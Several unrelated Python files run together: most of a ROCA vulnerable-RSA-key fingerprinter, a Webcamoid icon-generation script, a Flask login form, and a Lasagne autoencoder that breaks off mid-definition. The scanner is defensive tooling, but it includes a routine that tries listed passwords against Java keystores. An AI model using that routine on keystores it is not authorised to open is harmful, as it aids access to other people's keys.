pem_rec.strip() if len(pem_rec) == 0: continue if startswith(pem_rec, '-----BEGIN CERTIFICATE REQUEST'): return self.process_pem_csr(pem_rec, name, idx) elif startswith(pem_rec, '-----BEGIN CERTIF'): return self.process_pem_cert(pem_rec, name, idx) elif startswith(pem_rec, '-----BEGIN '): # fallback return self.process_pem_rsakey(pem_rec, name, idx) return ret except Exception as e: logger.debug('Exception processing PEM file %s : %s' % (name, e)) self.trace_logger.log(e) return None def process_pem_cert(self, data, name, idx): """ Processes PEM encoded certificate :param data: :param name: :param idx: :return: """ from cryptography.x509.base import load_der_x509_certificate try: x509 = load_der_x509_certificate(pem_to_der(data), self.get_backend()) self.num_pem_certs += 1 return self.process_x509(x509, name=name, idx=idx, data=data, pem=True, source='pem-cert') except Exception as e: logger.debug('PEM processing failed: %s' % e) self.trace_logger.log(e) def process_pem_csr(self, data, name, idx): """ Processes PEM encoded certificate request PKCS#10 :param data: :param name: :param idx: :return: """ from cryptography.x509.base import load_der_x509_csr try: csr = load_der_x509_csr(pem_to_der(data), self.get_backend()) self.num_pem_csr += 1 return self.process_csr(csr, name=name, idx=idx, data=data, pem=True, source='pem-csr') except Exception as e: logger.debug('PEM processing failed: %s' % e) self.trace_logger.log(e) def process_pem_rsakey(self, data, name, idx): """ Processes PEM encoded RSA key :param data: :param name: :param idx: :return: """ from cryptography.hazmat.primitives.serialization import load_der_public_key from cryptography.hazmat.primitives.serialization import load_der_private_key try: if startswith(data, '-----BEGIN RSA PUBLIC KEY') or startswith(data, '-----BEGIN PUBLIC KEY'): rsa = load_der_public_key(pem_to_der(data), self.get_backend()) public_numbers = rsa.public_numbers() elif startswith(data, '-----BEGIN RSA PRIVATE KEY') or startswith(data, '-----BEGIN PRIVATE KEY'): rsa = load_der_private_key(pem_to_der(data), None, self.get_backend()) public_numbers = rsa.private_numbers().public_numbers else: return None self.num_rsa_keys += 1 self.num_rsa += 1 js = collections.OrderedDict() js['type'] = 'pem-rsa-key' js['fname'] = name js['idx'] = idx js['pem'] = data js['e'] = '0x%x' % public_numbers.e js['n'] = '0x%x' % public_numbers.n if self.has_fingerprint(public_numbers.n): logger.warning('Fingerprint found in PEM RSA key %s ' % name) self.mark_and_add_effort(public_numbers.n, js) if self.do_print: print(json.dumps(js)) return TestResult(js) except Exception as e: logger.debug('Pubkey loading error: %s : %s [%s] : %s' % (name, idx, data[:20], e)) self.trace_logger.log(e) def process_der(self, data, name): """ DER processing :param data: :param name: :return: """ from cryptography.x509.base import load_der_x509_certificate try: x509 = load_der_x509_certificate(data, self.get_backend()) self.num_der_certs += 1 return self.process_x509(x509, name=name, pem=False, source='der-cert') except Exception as e: logger.debug('DER processing failed: %s : %s' % (name, e)) self.trace_logger.log(e) def process_x509(self, x509, name, idx=None, data=None, pem=True, source='', aux=None): """ Processing parsed X509 certificate :param x509: :param name: :param idx: :param data: :param pem: :param source: :param aux: :return: """ if x509 is None: return from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey from 
cryptography.x509.oid import NameOID pub = x509.public_key() if not isinstance(pub, RSAPublicKey): return self.num_rsa += 1 pubnum = x509.public_key().public_numbers() js = collections.OrderedDict() js['type'] = source js['fname'] = name js['idx'] = idx js['fprint'] = binascii.hexlify(x509.fingerprint(hashes.SHA256())) js['subject'] = utf8ize(try_get_dn_string(x509.subject, shorten=True)) js['issuer'] = utf8ize(try_get_dn_string(x509.issuer, shorten=True)) js['issuer_org'] = utf8ize(try_get_dn_part(x509.issuer, NameOID.ORGANIZATION_NAME)) js['created_at'] = self.strtime(x509.not_valid_before) js['created_at_utc'] = unix_time(x509.not_valid_before) js['not_valid_after_utc'] = unix_time(x509.not_valid_after) js['pem'] = data if pem else None js['aux'] = aux js['e'] = '0x%x' % pubnum.e js['n'] = '0x%x' % pubnum.n if self.has_fingerprint(pubnum.n): logger.warning('Fingerprint found in the Certificate %s idx %s ' % (name, idx)) self.mark_and_add_effort(pubnum.n, js) if self.do_print: print(json.dumps(js)) return TestResult(js) def process_csr(self, csr, name, idx=None, data=None, pem=True, source='', aux=None): """ Processing parsed X509 csr :param csr: :type csr: cryptography.x509.CertificateSigningRequest :param name: :param idx: :param data: :param pem: :param source: :param aux: :return: """ if csr is None: return from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey pub = csr.public_key() if not isinstance(pub, RSAPublicKey): return self.num_rsa += 1 pubnum = csr.public_key().public_numbers() js = collections.OrderedDict() js['type'] = source js['fname'] = name js['idx'] = idx js['subject'] = utf8ize(try_get_dn_string(csr.subject, shorten=True)) js['pem'] = data if pem else None js['aux'] = aux js['e'] = '0x%x' % pubnum.e js['n'] = '0x%x' % pubnum.n if self.has_fingerprint(pubnum.n): logger.warning('Fingerprint found in the CSR %s idx %s ' % (name, idx)) self.mark_and_add_effort(pubnum.n, js) if self.do_print: print(json.dumps(js)) return TestResult(js) def process_pgp(self, data, name): """ PGP key processing :param data: :param name: :return: """ ret = [] try: data = to_string(data) parts = re.split(r'-{5,}BEGIN', data) if len(parts) == 0: return if len(parts[0]) == 0: parts.pop(0) crt_arr = ['-----BEGIN' + x for x in parts] for idx, pem_rec in enumerate(crt_arr): try: pem_rec = pem_rec.strip() if len(pem_rec) == 0: continue ret.append(self.process_pgp_raw(pem_rec.encode(), name, idx)) except Exception as e: logger.error('Exception in processing PGP rec file %s: %s' % (name, e)) self.trace_logger.log(e) except Exception as e: logger.error('Exception in processing PGP file %s: %s' % (name, e)) self.trace_logger.log(e) return ret def process_pgp_raw(self, data, name, file_idx=None): """ Processes single PGP key :param data: file data :param name: file name :param file_idx: index in the file :return: """ try: from pgpdump.data import AsciiData from pgpdump.packet import SignaturePacket, PublicKeyPacket, PublicSubkeyPacket, UserIDPacket except Exception as e: logger.warning('Could not import pgpdump, try running: pip install pgpdump') return [TestResult(fname=name, type='pgp', error='cannot-import')] ret = [] js_base = collections.OrderedDict() pgp_key_data = AsciiData(data) packets = list(pgp_key_data.packets()) self.num_pgp_masters += 1 master_fprint = None master_key_id = None identities = [] pubkeys = [] sign_key_ids = [] sig_cnt = 0 for idx, packet in enumerate(packets): if isinstance(packet, PublicKeyPacket): master_fprint = packet.fingerprint master_key_id = 
format_pgp_key(packet.key_id) pubkeys.append(packet) elif isinstance(packet, PublicSubkeyPacket): pubkeys.append(packet) elif isinstance(packet, UserIDPacket): identities.append(packet) elif isinstance(packet, SignaturePacket): sign_key_ids.append(packet.key_id) sig_cnt += 1 # Names / identities ids_arr = [] identity = None for packet in identities: idjs = collections.OrderedDict() idjs['name'] = packet.user_name idjs['email'] = packet.user_email ids_arr.append(idjs) if identity is None: identity = '%s <%s>' % (packet.user_name, packet.user_email) js_base['type'] = 'pgp' js_base['fname'] = name js_base['fname_idx'] = file_idx js_base['master_key_id'] = master_key_id js_base['master_fprint'] = master_fprint js_base['identities'] = ids_arr js_base['signatures_count'] = sig_cnt js_base['packets_count'] = len(packets) js_base['keys_count'] = len(pubkeys) js_base['signature_keys'] = list(set(sign_key_ids)) # Public keys processing for packet in pubkeys: try: self.num_pgp_total += 1 if packet.modulus is None: continue self.num_rsa += 1 js = collections.OrderedDict(js_base) js['created_at'] = self.strtime(packet.creation_time) js['created_at_utc'] = unix_time(packet.creation_time) js['is_master'] = master_fprint == packet.fingerprint js['kid'] = format_pgp_key(packet.key_id) js['bitsize'] = packet.modulus_bitlen js['master_kid'] = master_key_id js['e'] = '0x%x' % packet.exponent js['n'] = '0x%x' % packet.modulus if self.has_fingerprint(packet.modulus): self.mark_and_add_effort(packet.modulus, js) logger.warning('Fingerprint found in PGP key %s key ID 0x%s' % (name, js['kid'])) if self.do_print: print(json.dumps(js)) ret.append(TestResult(js)) except Exception as e: logger.error('Excetion in processing the key: %s' % e) self.trace_logger.log(e) return ret def process_ssh(self, data, name): """ Processes SSH keys :param data: :param name: :return: """ if data is None or len(data) == 0: return ret = [] try: lines = [x.strip() for x in data.split(b'\n')] for idx, line in enumerate(lines): ret.append(self.process_ssh_line(line, name, idx)) except Exception as e: logger.debug('Exception in processing SSH public key %s : %s' % (name, e)) self.trace_logger.log(e) return ret def process_ssh_line(self, data, name, idx): """ Processes single SSH key :param data: :param name: :param idx: :return: """ data = data.strip() if not contains(data, 'ssh-rsa'): return # strip ssh params / adjustments try: data = data[to_bytes(data).find(b'ssh-rsa'):] except Exception as e: pass from cryptography.hazmat.primitives.serialization import load_ssh_public_key from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey try: key_obj = load_ssh_public_key(data, self.get_backend()) self.num_ssh += 1 if not isinstance(key_obj, RSAPublicKey): return self.num_rsa += 1 numbers = key_obj.public_numbers() js = collections.OrderedDict() js['type'] = 'ssh-rsa' js['fname'] = name js['idx'] = idx js['e'] = '0x%x' % numbers.e js['n'] = '0x%x' % numbers.n js['ssh'] = data if self.has_fingerprint(numbers.n): logger.warning('Fingerprint found in the SSH key %s idx %s ' % (name, idx)) self.mark_and_add_effort(numbers.n, js) if self.do_print: print(json.dumps(js)) return TestResult(js) except Exception as e: logger.debug('Exception in processing SSH public key %s idx %s : %s' % (name, idx, e)) self.trace_logger.log(e) def process_json(self, data, name): """ Processes as a JSON :param data: :param name: :return: """ if data is None or len(data) == 0: return ret = [] try: lines = [x.strip() for x in data.split(bytes(b'\n'))] for 
idx, line in enumerate(lines): ret.append(self.process_json_line(line, name, idx)) except Exception as e: logger.debug('Exception in processing JSON %s : %s' % (name, e)) self.trace_logger.log(e) return ret def process_json_line(self, data, name, idx): """ Processes single json line :param data: :param name: :param idx: :return: """ data = data.strip() if len(data) == 0: return ret = [] try: js = json.loads(data) self.num_json += 1 ret.append(self.process_json_rec(js, name, idx, [])) except Exception as e: logger.debug('Exception in processing JSON %s idx %s : %s' % (name, idx, e)) self.trace_logger.log(e) return ret def process_json_rec(self, data, name, idx, sub_idx): """ Processes json rec - json object :param data: :param name: :param idx: :param sub_idx: :return: """ ret = [] if isinstance(data, list): for kidx, rec in enumerate(data): sub = self.process_json_rec(rec, name, idx, list(sub_idx + [kidx])) ret.append(sub) return ret if isinstance(data, dict): for key in data: rec = data[key] sub = self.process_json_rec(rec, name, idx, list(sub_idx + [rec])) ret.append(sub) if 'n' in data: ret.append(self.process_js_mod(data['n'], name, idx, sub_idx)) if 'mod' in data: ret.append(self.process_js_mod(data['mod'], name, idx, sub_idx)) if 'cert' in data: ret.append(self.process_js_certs([data['cert']], name, idx, sub_idx)) if 'certs' in data: ret.append(self.process_js_certs(data['certs'], name, idx, sub_idx)) return ret def process_js_mod(self, data, name, idx, sub_idx): """ Processes one moduli from JSON :param data: :param name: :param idx: :param sub_idx: :return: """ if isinstance(data, (int, long)): js = collections.OrderedDict() js['type'] = 'js-mod-num' js['fname'] = name js['idx'] = idx js['sub_idx'] = sub_idx js['n'] = '0x%x' % data if self.has_fingerprint(data): logger.warning('Fingerprint found in json int modulus %s idx %s %s' % (name, idx, sub_idx)) self.mark_and_add_effort(data, js) if self.do_print: print(json.dumps(js)) return TestResult(js) self.process_mod_line(data, name, idx, aux={'stype': 'json', 'sub_idx': sub_idx}) def process_js_certs(self, data, name, idx, sub_idx): """ Process one certificate from JSON :param data: :param name: :param idx: :param sub_idx: :return: """ from cryptography.x509.base import load_der_x509_certificate ret = [] for crt_hex in data: try: bindata = base64.b64decode(crt_hex) x509 = load_der_x509_certificate(bindata, self.get_backend()) self.num_ldiff_cert += 1 sub = self.process_x509(x509, name=name, pem=False, source='ldiff-cert') ret.append(sub) except Exception as e: logger.debug('Error in line JSON cert file processing %s, idx %s, subidx %s : %s' % (name, idx, sub_idx, e)) self.trace_logger.log(e) return ret def process_apk(self, data, name): """ Processes Android application :param data: :param name: :return: """ try: from apk_parse.apk import APK except Exception as e: logger.warning('Could not import apk_parse, try running: pip install apk_parse_ph4') return [TestResult(fname=name, type='apk-pem-cert', error='cannot-import')] ret = [] try: from cryptography.x509.base import load_der_x509_certificate apkf = APK(data, process_now=False, process_file_types=False, raw=True, temp_dir=self.args.tmp_dir) apkf.process() self.num_apk += 1 pem = apkf.cert_pem aux = {'subtype': 'apk'} x509 = load_der_x509_certificate(pem_to_der(pem), self.get_backend()) sub = self.process_x509(x509, name=name, idx=0, data=data, pem=True, source='apk-pem-cert', aux=aux) ret.append(sub) except Exception as e: logger.debug('Exception in processing APK %s : %s' % 
(name, e)) self.trace_logger.log(e) return ret def process_mod(self, data, name): """ Processing one modulus per line :param data: :param name: :return: """ ret = [] try: lines = [x.strip() for x in data.split(bytes(b'\n'))] for idx, line in enumerate(lines): sub = self.process_mod_line(line, name, idx) ret.append(sub) except Exception as e: logger.debug('Error in line mod file processing %s : %s' % (name, e)) self.trace_logger.log(e) return ret def process_mod_line(self, data, name, idx, aux=None): """ Processes one line mod :param data: :param name: :param idx: :param aux: :return: """ if data is None or len(data) == 0: return ret = [] try: if self.args.key_fmt_base64 or self.re_match(r'^[a-zA-Z0-9+/=\s\t]+$', data): ret.append(self.process_mod_line_num(strip_spaces(data), name, idx, 'base64', aux)) if self.args.key_fmt_hex or self.re_match(r'^(0x)?[a-fA-F0-9\s\t]+$', data): ret.append(self.process_mod_line_num(strip_spaces(data), name, idx, 'hex', aux)) if self.args.key_fmt_dec or self.re_match(r'^[0-9\s\t]+$', data): ret.append(self.process_mod_line_num(strip_spaces(data), name, idx, 'dec', aux)) except Exception as e: logger.debug('Error in line mod processing %s idx %s : %s' % (name, idx, e)) self.trace_logger.log(e) return ret def process_mod_line_num(self, data, name, idx, num_type='hex', aux=None): """ Processes particular number :param data: :param name: :param idx: :param num_type: :param aux: :return: """ try: num = 0 if num_type == 'base64': num = int(base64.b16encode(base64.b64decode(data)), 16) elif num_type == 'hex': num = int(strip_hex_prefix(data), 16) elif num_type == 'dec': num = int(data) else: raise ValueError('Unknown number format: %s' % num_type) js = collections.OrderedDict() js['type'] = 'mod-%s' % num_type js['fname'] = name js['idx'] = idx js['aux'] = aux js['n'] = '0x%x' % num if self.has_fingerprint(num): logger.warning('Fingerprint found in modulus %s idx %s ' % (name, idx)) self.mark_and_add_effort(num, js) if self.do_print: print(json.dumps(js)) return TestResult(js) except Exception as e: logger.debug('Exception in testing modulus %s idx %s : %s data: %s' % (name, idx, e, data[:30])) self.trace_logger.log(e) def process_ldiff(self, data, name): """ Processes LDAP output field;binary::blob :param data: :param name: :return: """ from cryptography.x509.base import load_der_x509_certificate reg = re.compile(r'binary::\s*([0-9a-zA-Z+/=\s\t\r\n]{20,})$', re.MULTILINE | re.DOTALL) matches = re.findall(reg, str(data)) ret = [] num_certs_found = 0 for idx, match in enumerate(matches): match = re.sub('[\r\t\n\s]', '', match) try: bindata = base64.b64decode(match) x509 = load_der_x509_certificate(bindata, self.get_backend()) self.num_ldiff_cert += 1 sub = self.process_x509(x509, name=name, pem=False, source='ldiff-cert') ret.append(sub) except Exception as e: logger.debug('Error in line ldiff file processing %s, idx %s, matchlen %s : %s' % (name, idx, len(match), e)) self.trace_logger.log(e) return ret def process_jks(self, data, name): """ Processes Java Key Store file :param data: :param name: :return: """ if self.jks_file_passwords is None and self.args.jks_pass_file is not None: self.jks_file_passwords = [] if not os.path.exists(self.args.jks_pass_file): logger.warning('JKS password file %s does not exist' % self.args.jks_pass_file) with open(self.args.jks_pass_file) as fh: self.jks_file_passwords = sorted(list(set([x.strip() for x in fh]))) if self.jks_file_passwords is None: self.jks_file_passwords = [] try: ks = self.try_open_jks(data, name) if ks is None: 
logger.warning('Could not open JKS file: %s, password not valid, ' 'try specify passwords in --jks-pass-file' % name) return # certs from cryptography.x509.base import load_der_x509_certificate ret = [] for alias, cert in list(ks.certs.items()): try: x509 = load_der_x509_certificate(cert.cert, self.get_backend()) self.num_jks_cert += 1 sub = self.process_x509(x509, name=name, pem=False, source='jks-cert', aux='cert-%s' % alias) ret.append(sub) except Exception as e: logger.debug('Error in JKS cert processing %s, alias %s : %s' % (name, alias, e)) self.trace_logger.log(e) # priv key chains for alias, pk in list(ks.private_keys.items()): for idx, cert in enumerate(pk.cert_chain): try: x509 = load_der_x509_certificate(cert[1], self.get_backend()) self.num_jks_cert += 1 sub = self.process_x509(x509, name=name, pem=False, source='jks-cert-chain', aux='cert-chain-%s-%s' % (alias, idx)) ret.append(sub) except Exception as e: logger.debug('Error in JKS priv key cert-chain processing %s, alias %s %s : %s' % (name, alias, idx, e)) self.trace_logger.log(e) return ret except ImportException: return [TestResult(fname=name, type='jks-cert', error='cannot-import')] except Exception as e: logger.warning('Exception in JKS processing: %s' % e) return None def try_open_jks(self, data, name): """ Tries to guess JKS password :param name: :param data: :return: """ try: import jks except: logger.warning('Could not import jks, try running: pip install pyjks') raise ImportException('Cannot import pyjks') pwdlist = sorted(list(set(self.jks_file_passwords + self.jks_passwords))) for cur in pwdlist: try: return jks.KeyStore.loads(data, cur) except Exception as e: pass return None def process_pkcs7(self, data, name): """ Process PKCS7 signature with certificate in it. :param data: :param name: :return: """ from cryptography.hazmat.backends.openssl.backend import backend from cryptography.hazmat.backends.openssl.x509 import _Certificate # DER conversion is_pem = startswith(data, '-----') if self.re_match(r'^[a-zA-Z0-9-\s+=/]+$', data): is_pem = True try: der = data if is_pem: data = data.decode('utf8') data = re.sub(r'\s*-----\s*BEGIN\s+PKCS7\s*-----', '', data) data = re.sub(r'\s*-----\s*END\s+PKCS7\s*-----', '', data) der = base64.b64decode(data) bio = backend._bytes_to_bio(der) pkcs7 = backend._lib.d2i_PKCS7_bio(bio.bio, backend._ffi.NULL) backend.openssl_assert(pkcs7 != backend._ffi.NULL) signers = backend._lib.PKCS7_get0_signers(pkcs7, backend._ffi.NULL, 0) backend.openssl_assert(signers != backend._ffi.NULL) backend.openssl_assert(backend._lib.sk_X509_num(signers) > 0) x509_ptr = backend._lib.sk_X509_value(signers, 0) backend.openssl_assert(x509_ptr != backend._ffi.NULL) x509_ptr = backend._ffi.gc(x509_ptr, backend._lib.X509_free) x509 = _Certificate(backend, x509_ptr) self.num_pkcs7_cert += 1 return [self.process_x509(x509, name=name, pem=False, source='pkcs7-cert', aux='')] except Exception as e: logger.debug('Error in PKCS7 processing %s: %s' % (name, e)) self.trace_logger.log(e) # # Helpers & worker # def re_match(self, pattern, haystack, **kwargs): """ re.match py3 compat :param pattern: :param haystack: :return: """ try: return re.match(pattern, haystack.decode('utf8'), **kwargs) except Exception as e: logger.debug('re.match exception: %s' % e) self.trace_logger.log(e) def strtime(self, x): """ Simple time format :param x: :return: """ if x is None: return x return x.strftime('%Y-%m-%d') def get_backend(self, backend=None): """ Default crypto backend :param backend: :return: """ from 
cryptography.hazmat.backends import default_backend return default_backend() if backend is None else backend def dump(self, ret): """ Dumps the return value :param ret: :return: """ if self.args.flatten: ret = drop_none(flatten(ret)) logger.info('Dump: \n' + json.dumps(ret, cls=AutoJSONEncoder, indent=2 if self.args.indent else None)) def work(self): """ Entry point after argument processing. :return: """ self.do_print = True if self.args.old: self.switch_fingerprint_method(True) ret = self.process_inputs() if self.args.dump: self.dump(ret) logger.info('### SUMMARY ####################') logger.info('Records tested: %s' % self.tested) logger.info('.. PEM certs: . . . %s' % self.num_pem_certs) logger.info('.. DER certs: . . . %s' % self.num_der_certs) logger.info('.. RSA key files: . %s' % self.num_rsa_keys) logger.info('.. PGP master keys: %s' % self.num_pgp_masters) logger.info('.. PGP total keys: %s' % self.num_pgp_total) logger.info('.. SSH keys: . . . %s' % self.num_ssh) logger.info('.. APK keys: . . . %s' % self.num_apk) logger.info('.. JSON keys: . . . %s' % self.num_json) logger.info('.. LDIFF certs: . . %s' % self.num_ldiff_cert) logger.info('.. JKS certs: . . . %s' % self.num_jks_cert) logger.info('.. PKCS7: . . . . . %s' % self.num_pkcs7_cert) logger.debug('. Total RSA keys . %s (# of keys RSA extracted & analyzed)' % self.num_rsa) if self.found > 0: logger.info('Fingerprinted keys found: %s' % self.found) logger.info('WARNING: Potential vulnerability') else: logger.info('No fingerprinted keys found (OK)') logger.info('################################') def init_parser(self): """ Init command line parser :return: """ parser = argparse.ArgumentParser(description='ROCA Fingerprinter') parser.add_argument('--tmp', dest='tmp_dir', default='.', help='Temporary dir for subprocessing (e.g. 
APK parsing scratch)') parser.add_argument('--debug', dest='debug', default=False, action='store_const', const=True, help='Debugging logging') parser.add_argument('--dump', dest='dump', default=False, action='store_const', const=True, help='Dump all processed info') parser.add_argument('--flatten', dest='flatten', default=False, action='store_const', const=True, help='Flatten the dump') parser.add_argument('--indent', dest='indent', default=False, action='store_const', const=True, help='Indent the dump') parser.add_argument('--old', dest='old', default=False, action='store_const', const=True, help='Old fingerprinting algorithm - moduli detector') parser.add_argument('--base64-stdin', dest='base64stdin', default=False, action='store_const', const=True, help='Decode STDIN as base64') parser.add_argument('--file-pem', dest='file_pem', default=False, action='store_const', const=True, help='Force read as PEM encoded file') parser.add_argument('--file-der', dest='file_der', default=False, action='store_const', const=True, help='Force read as DER encoded file') parser.add_argument('--file-pgp', dest='file_pgp', default=False, action='store_const', const=True, help='Force read as PGP ASC encoded file') parser.add_argument('--file-ssh', dest='file_ssh', default=False, action='store_const', const=True, help='Force read as SSH public key file') parser.add_argument('--file-mod', dest='file_mod', default=False, action='store_const', const=True, help='Force read as One modulus per line') parser.add_argument('--file-json', dest='file_json', default=False, action='store_const', const=True, help='Force read as JSON file') parser.add_argument('--file-ldiff', dest='file_ldiff', default=False, action='store_const', const=True, help='Force read as LDIFF file') parser.add_argument('--file-pkcs7', dest='file_pkcs7', default=False, action='store_const', const=True, help='Force read as PKCS7 file') parser.add_argument('--key-fmt-base64', dest='key_fmt_base64', default=False, action='store_const', const=True, help='Modulus per line, base64 encoded') parser.add_argument('--key-fmt-hex', dest='key_fmt_hex', default=False, action='store_const', const=True, help='Modulus per line, hex encoded') parser.add_argument('--key-fmt-dec', dest='key_fmt_dec', default=False, action='store_const', const=True, help='Modulus per line, dec encoded') parser.add_argument('--jks-pass-file', dest='jks_pass_file', default=None, help='Password file for JKS, one per line') parser.add_argument('files', nargs=argparse.ZERO_OR_MORE, default=[], help='files to process') return parser def main(self): """ Main entry point :return: """ parser = self.init_parser() self.args = parser.parse_args() if self.args.debug: coloredlogs.install(level=logging.DEBUG, fmt=LOG_FORMAT) self.work() def main(): app = RocaFingerprinter() app.main() if __name__ == '__main__': main()
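# --- Usage sketch (hedged; not part of the original tool) --------------------
# A minimal illustration of driving the fingerprinter above programmatically:
# main() builds RocaFingerprinter and parses sys.argv through init_parser(),
# so the flags used here (--dump, --flatten, positional file paths) are the
# ones declared above. The program name and file names are placeholders.
import sys


def _roca_usage_sketch():
    sys.argv = ['roca-detect', '--dump', '--flatten', 'server.pem', 'id_rsa.pub']
    main()  # prints one JSON record per tested key, then the summary block
# ------------------------------------------------------------------------------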
#!/usr/bin/env python # # Webcamoid, webcam capture application. # Copyright (C) 2019 Gonzalo Exequiel Pedone # # Webcamoid is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Webcamoid is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Webcamoid. If not, see <http://www.gnu.org/licenses/>. # # Web-Site: http://webcamoid.github.io/ import os import shutil import subprocess # nosec import tempfile import uuid # Utils def createPng(inputFile, outputFile, size, dpi): if not shutil.which('inkscape'): return # Convert SVG to PNG. subprocess.Popen(['inkscape', # nosec '-d', '{0}'.format(dpi), '-w', '{0}'.format(size), '-h', '{0}'.format(size), inputFile, '-o', outputFile]).communicate() # Optimize PNG. if shutil.which('pngquant'): subprocess.Popen(['pngquant', '--verbose', '--force', '--strip', '--output', outputFile, outputFile]).communicate() elif shutil.which('optipng'): subprocess.Popen(['optipng', # nosec '-O7', '-zw', '32k', outputFile]).communicate() # Remove metadata. if shutil.which('exiv2'): subprocess.Popen(['exiv2', 'rm', outputFile]).communicate() def createIco(inputFile, outputFile, size, dpi): if not shutil.which('inkscape'): return # Convert SVG to PNG. tmpFile = os.path.join(tempfile.gettempdir(), 'tmp-' + str(uuid.uuid4()) + '.png') subprocess.Popen(['inkscape', # nosec '-d', '{0}'.format(dpi), '-w', '{0}'.format(size), '-h', '{0}'.format(size), inputFile, '-o', tmpFile]).communicate() # Convert PNG to ICO. if shutil.which('convert'): subprocess.Popen(['convert', tmpFile, outputFile]).communicate() if os.path.exists(tmpFile): os.remove(tmpFile) def createIcns(outputFile, icons): if not shutil.which('png2icns'): return subprocess.Popen(['png2icns', # nosec outputFile] + icons).communicate() # Remove old icons iconSize = [8, 16, 22, 32, 48, 64, 128, 256] for root, dirs, _ in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for d in dirs: if d == 'scalable': for size in iconSize: outdir = os.path.realpath(os.path.join(root, '{0}x{0}'.format(size))) try: shutil.rmtree(outdir) except: pass # Optimize SVG files. for root, _, files in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for f in files: if f.endswith('.svg'): filePath = os.path.realpath(os.path.join(root, f)) basename, _ = os.path.splitext(f) tmpPath = os.path.realpath(os.path.join(root, basename + '.tmp.svg')) # Optimize SVG. if shutil.which('scour'): subprocess.Popen(['scour', '--enable-viewboxing', '--enable-id-stripping', '--enable-comment-stripping', '--shorten-ids', '--indent=none', '-i', filePath, '-o', tmpPath]).communicate() try: shutil.move(tmpPath, filePath) except: pass elif shutil.which('inkscape'): subprocess.Popen(['inkscape', '-z', '--vacuum-defs', '-f', filePath, '-l', tmpPath]).communicate() try: shutil.move(tmpPath, filePath) except: pass # Generate default theme icons. 
for root, _, files in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for f in files: if f.endswith('.svg'): filePath = os.path.join(root, f) outdir = os.path.realpath(os.path.join(root, '..')) for size in iconSize: basename, _ = os.path.splitext(f) outfile = os.path.join(outdir, '{0}x{0}'.format(size), basename + '.png') try: os.makedirs(os.path.dirname(outfile)) except: pass createPng(filePath, outfile, size, 120) if basename == 'webcamoid': outfile = os.path.join(outdir, '{0}x{0}'.format(size), basename + '.ico') createIco(filePath, outfile, size, 120) # Generate Mac icns file. macIconSize = [16, 32, 48, 128, 256, 512, 1024] icons = [] for root, dirs, _ in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for d in dirs: if d == 'scalable': for size in macIconSize: iconPath = os.path.realpath(os.path.join(root, '{0}x{0}'.format(size), 'webcamoid.png')) if os.path.exists(iconPath): icons.append(iconPath) createIcns('../StandAlone/share/themes/WebcamoidTheme/icons/webcamoid.icns', icons) # Update icons resources file. with open('../StandAlone/icons.qrc', 'w') as resource: resource.write('<RCC>\n') resource.write(' <qresource prefix="/Webcamoid">\n') resourceFiles = [] for root, _, files in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for f in files: resourceFiles.append(os.path.join(root.replace('../StandAlone/', ''), f)) for res in sorted(resourceFiles): resource.write(8 * ' ' + '<file>' + res + '</file>\n') resource.write(' </qresource>\n') resource.write('</RCC>\n') # Generate Android icons. assets = [("ldpi" , 120, 36), ("mdpi" , 160, 48), ("hdpi" , 240, 72), ("xhdpi" , 320, 96), ("xxhdpi" , 480, 144), ("xxxhdpi", 640, 192)] for folder, dpi, size in assets: filePath = '../StandAlone/share/themes/WebcamoidTheme/icons/hicolor/scalable/webcamoid.svg' outfile = '../StandAlone/share/android/res/drawable-{}/icon.png'.format(folder) createPng(filePath, outfile, size, dpi)
from flask_wtf import Form
from wtforms import TextField, PasswordField
from wtforms.validators import DataRequired

from brewing.user.models import User


class LoginForm(Form):
    username = TextField('Username', validators=[DataRequired()])
    password = PasswordField('Password', validators=[DataRequired()])

    def __init__(self, *args, **kwargs):
        super(LoginForm, self).__init__(*args, **kwargs)
        self.user = None

    def validate(self):
        initial_validation = super(LoginForm, self).validate()
        if not initial_validation:
            return False
        self.user = User.query.filter_by(username=self.username.data).first()
        if not self.user:
            self.username.errors.append('Unknown username')
            return False
        if not self.user.check_password(self.password.data):
            self.password.errors.append('Invalid password')
            return False
        if not self.user.active:
            self.username.errors.append('User not activated')
            return False
        return True
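# --- Usage sketch (hedged) ----------------------------------------------------
# How a form like LoginForm is typically consumed in a Flask view. The
# blueprint, route, template name and Flask-Login call below are assumptions
# for illustration only; they are not part of the file above.
from flask import Blueprint, flash, redirect, render_template
from flask_login import login_user  # assumed: the project uses Flask-Login

public = Blueprint('public', __name__)


@public.route('/login/', methods=['GET', 'POST'])
def login():
    form = LoginForm()
    if form.validate_on_submit():
        # validate() above has already resolved form.user and checked the
        # password and the "active" flag.
        login_user(form.user)
        flash('You are logged in.')
        return redirect('/')
    return render_template('login.html', form=form)  # hypothetical template
# ------------------------------------------------------------------------------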
import gzip import itertools import os import sys import numpy as np import lasagne import theano import theano.sparse import pylab import matplotlib.pyplot as plt import theano.tensor as T import time import matplotlib.pyplot as plt import load_real_data as lrd from lasagne.objectives import squared_error,aggregate from lasagne.layers import get_output from lasagne.layers import get_all_params from sklearn.metrics import classification_report, accuracy_score max_epochs = 50 batch_size = 1000 learning_rate = 0.05 momentum = 0.9 io_dim = 1200 chosen_batch = 9 activation_threshold = -0.57 # between -0.5 --- -0.638 def autoencoder(input_d, output_d): l_in = lasagne.layers.InputLayer( shape=(batch_size, input_d), ) l_hidden1 = lasagne.layers.DenseLayer( l_in, num_units=300, nonlinearity=lasagne.nonlinearities.rectify, ) l_hidden2 = lasagne.layers.DenseLayer( l_hidden1, num_units=10, nonlinearity=lasagne.nonlinearities.rectify, ) l_hidden3 = lasagne.layers.DenseLayer( l_hidden2, num_units=300, nonlinearity=lasagne.nonlinearities.rectify, ) l_out = lasagne.layers.DenseLayer( l_hidden3, num_units=output_d, 